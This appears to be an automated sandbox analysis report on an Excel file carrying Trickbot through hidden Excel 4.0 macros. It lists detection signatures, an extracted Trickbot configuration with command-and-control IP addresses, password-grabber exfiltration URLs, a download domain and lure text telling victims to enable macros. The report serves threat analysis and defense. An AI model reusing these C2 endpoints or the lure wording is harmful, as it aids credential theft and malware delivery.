Analysis Report SecuriteInfo.com.Heur.31681.20936

Overview

General Information

Sample Name:	SecuriteInfo.com.Heur.31681.20936 (renamed file extension from 20936 to xls)
Analysis ID:	403507
MD5:	6f7f78fa1fbe9be8fbe20812658c43aa
SHA1:	d3f78f528a797c2e97af9f25e189bc43d98f2eae
SHA256:	4d05d391297e3c4ec1bc4047bd3e104f37123c709797854053966ced43f492fb
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Trickbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Trickbot

Allocates memory in foreign processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Hijacks the control flow in another process

May check the online IP address of the machine

Office process drops PE file

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp

Malware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net9", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll	ReversingLabs: Detection: 32%
Source: C:\Users\user\fndskfnds.dfm	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300 CryptAcquireContextW,		5_2_00068300
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083634 CryptUnprotectData,		9_2_0000000180083634

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,		5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,		5_2_00063B00

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: netmouser[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00073460
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx edx, word ptr [eax]	5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000792A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000756D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then movzx ecx, word ptr [eax+02h]	5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00079010
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00082890
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec ecx	5_2_000784A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000784A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov ebx, edx	5_2_000744D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000744D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073CFF
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_00074D36
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073D6F
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073D8D
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_0006A990
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DAF
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_000801D0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DDB
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073DF6
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then call 000619E0h	5_2_000671F0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_0007B1F0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ecx	5_2_0006D600
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00070E00
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then mov esi, esi	5_2_00073E15
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_0006E640
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_0006E250
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then cmp dword ptr [eax], ecx	5_2_0006D6A0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec edi	5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00070F00
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then dec eax	5_2_00068750
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc esp	5_2_00082BA0
Source: C:\Windows\System32\wermgr.exe	Code function: 4x nop then inc ebp	5_2_000783F0

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: deluciaspizza.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49170 -> 188.18.7.133:447

May check the online IP address of the machine

Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe	DNS query: name: api.ipify.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49170 -> 188.18.7.133:447

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.102.220.50 103.102.220.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown	TCP traffic detected without corresponding DNS query: 188.18.7.133

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EF8415A.emf

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.74.0Host: api.ipify.org

Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: deluciaspizza.com

Source: unknown

Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443
Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443Edge
Source: wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443W6
Source: wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmp	String found in binary or memory: http://103.102.220.50:443X6
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://115.241.244.185:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://177.84.63.252:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://185.119.120.213:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://189.195.96.238:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://190.89.3.117:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://36.95.27.243:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://5.202.120.150:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp	String found in binary or memory: http://83.220.115.230:443
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.c
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/
Source: wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp	String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown

HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected Trickbot

Source: Yara match

File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4	Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start I ' ' ' 18 the decryption of
Source: Document image extraction number: 2	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3	Screenshot OCR: Enable Content
Source: Document image extraction number: 4	Screenshot OCR: Enable Editing
Source: Document image extraction number: 13	Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document

Found Excel 4.0 Macro with suspicious formulas

Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: CALL
Source: SecuriteInfo.com.Heur.31681.xls	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\System32\wermgr.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00073410 NtDelayExecution,	5_2_00073410
